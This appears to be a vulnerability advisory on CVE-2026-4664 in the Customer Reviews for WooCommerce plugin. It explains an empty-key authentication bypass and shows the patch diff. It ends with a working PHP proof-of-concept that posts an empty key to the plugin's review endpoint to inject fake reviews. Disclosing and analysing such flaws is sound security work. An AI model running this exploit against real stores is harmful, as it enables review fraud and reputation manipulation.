Atomic Edge analysis of CVE-2026-4664:
This vulnerability is an unauthenticated authentication bypass in the Customer Reviews for WooCommerce WordPress plugin. The flaw allows attackers to submit arbitrary product reviews without authentication via the plugin’s REST API endpoint. The vulnerability affects all plugin versions up to and including 5.103.0, with a CVSS score of 5.3.
Atomic Edge research identifies the root cause in the `create_review_permissions_check()` function within `/includes/reviews/class-cr-endpoint.php`. The function compares a user-supplied `key` parameter against the stored `ivole_secret_key` meta value using strict equality (`===`). For orders where no review reminder email has been sent, the `ivole_secret_key` meta is not set, causing `get_meta()` to return an empty string. The permission check does not validate that the stored key is non-empty. An attacker can supply an empty `key` parameter (`””`) to match this empty stored value and bypass authentication.
Exploitation occurs via a POST request to the REST API endpoint `/wp-json/ivole/v1/review`. The attacker sends a JSON payload containing an empty `key` field and an `order` object with an `id` referencing any existing WooCommerce order. The request body structure is `{“key”:””,”order”:{“id”:123}}`. This payload bypasses the permission check in `create_review_permissions_check()`, allowing the attacker to submit reviews for any product, including products not associated with the referenced order.
The patch adds a check for a non-empty stored key before comparison. In `/includes/reviews/class-cr-endpoint.php` line 652, the condition changes from `if( $body2->key === $saved_key )` to `if ( ! empty( $saved_key ) && $body2->key === $saved_key )`. This ensures the stored `ivole_secret_key` meta value must be both non-empty and match the supplied key. The patch prevents authentication bypass by rejecting empty key comparisons.
Successful exploitation allows unauthenticated attackers to submit, modify, and inject product reviews on any WooCommerce product. Reviews are auto-approved by default because the `ivole_enable_moderation` setting defaults to `”no”`. This enables review spam, fake reviews, and potential reputation manipulation. Attackers can also submit reviews for products not associated with the referenced order, expanding the attack surface.
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/customer-reviews-woocommerce/class-ivole.php
+++ b/customer-reviews-woocommerce/class-ivole.php
@@ -85,7 +85,7 @@
require_once( __DIR__ . '/includes/analytics/class-cr-reviews-top-charts.php' );
class Ivole {
- const CR_VERSION = '5.103.0';
+ const CR_VERSION = '5.104.0';
public function __construct() {
if( function_exists( 'wc' ) ) {
--- a/customer-reviews-woocommerce/includes/reviews/class-cr-endpoint.php
+++ b/customer-reviews-woocommerce/includes/reviews/class-cr-endpoint.php
@@ -646,13 +646,13 @@
public function create_review_permissions_check( WP_REST_Request $request ) {
$body = $request->get_body();
$body2 = json_decode( $body );
- if( json_last_error() === JSON_ERROR_NONE ) {
- if( isset( $body2->key ) && isset( $body2->order ) ) {
- if( isset( $body2->order->id ) ) {
+ if ( json_last_error() === JSON_ERROR_NONE ) {
+ if ( isset( $body2->key ) && isset( $body2->order ) ) {
+ if ( isset( $body2->order->id ) ) {
$order = wc_get_order( $body2->order->id );
if ( $order ) {
$saved_key = $order->get_meta( 'ivole_secret_key', true );
- if( $body2->key === $saved_key ) {
+ if ( ! empty( $saved_key ) && $body2->key === $saved_key ) {
return true;
} else {
return new WP_Error(
@@ -669,8 +669,8 @@
);
}
}
- } else if( isset( $body2->test ) ) {
- if( false != get_option( 'ivole_test_secret_key' ) && $body2->test === get_option( 'ivole_test_secret_key' ) ){
+ } else if ( isset( $body2->test ) ) {
+ if ( false != get_option( 'ivole_test_secret_key' ) && $body2->test === get_option( 'ivole_test_secret_key' ) ){
return true;
}
}
--- a/customer-reviews-woocommerce/includes/settings/class-cr-admin-menu-settings.php
+++ b/customer-reviews-woocommerce/includes/settings/class-cr-admin-menu-settings.php
@@ -862,11 +862,12 @@
<ul class="cr-features-bnr-ul">
<li>A visual editor for email templates</li>
<li>Customize colors and fonts</li>
- <li>Multiple email templates for different languages</li>
+ <li>Create email templates for different languages</li>
+ <li>Embed review form in emails</li>
</ul>
<ul class="cr-features-bnr-ul">
- <li>Add an unsubscribe link to emails</li>
- <li>A shortcode to display an unsubscribe form</li>
+ <li>Include an unsubscribe link to emails</li>
+ <li>Display an unsubscribe form with a shortcode</li>
<li>Add a custom logo and images</li>
</ul>
</div>
--- a/customer-reviews-woocommerce/ivole.php
+++ b/customer-reviews-woocommerce/ivole.php
@@ -3,7 +3,7 @@
Plugin Name: Customer Reviews for WooCommerce
Description: Customer Reviews for WooCommerce plugin helps you get more customer reviews for your shop by sending automated reminders and coupons.
Plugin URI: https://wordpress.org/plugins/customer-reviews-woocommerce/
-Version: 5.103.0
+Version: 5.104.0
Author: CusRev
Author URI: https://www.cusrev.com/business/
Text Domain: customer-reviews-woocommerce
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-4664 - Customer Reviews for WooCommerce <= 5.103.0 - Unauthenticated Authentication Bypass to Arbitrary Review Submission via 'key' Parameter
<?php
// Configure target WordPress site URL
$target_url = 'https://example.com';
// REST API endpoint for review submission
$endpoint = '/wp-json/ivole/v1/review';
// Any existing WooCommerce order ID (can be brute-forced or guessed)
$order_id = 123;
// Construct JSON payload with empty key to trigger the bypass
$payload = json_encode([
'key' => '',
'order' => [
'id' => $order_id
],
// Additional review data - can be arbitrary
'product' => [
'id' => 456 // Target product ID (does not need to match order)
],
'review' => [
'rating' => 5,
'content' => 'Injected review via CVE-2026-4664',
'author' => 'Atomic Edge Research',
'email' => 'research@atomicedge.example'
]
]);
// Initialize cURL
$ch = curl_init($target_url . $endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: application/json',
'Content-Length: ' . strlen($payload)
]);
// Execute request
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
// Output results
if ($http_code === 200) {
echo "[+] SUCCESS: Review submitted via authentication bypassn";
echo "Response: " . $response . "n";
} else {
echo "[-] FAILED: HTTP $http_coden";
echo "Response: " . $response . "n";
}
curl_close($ch);
?>
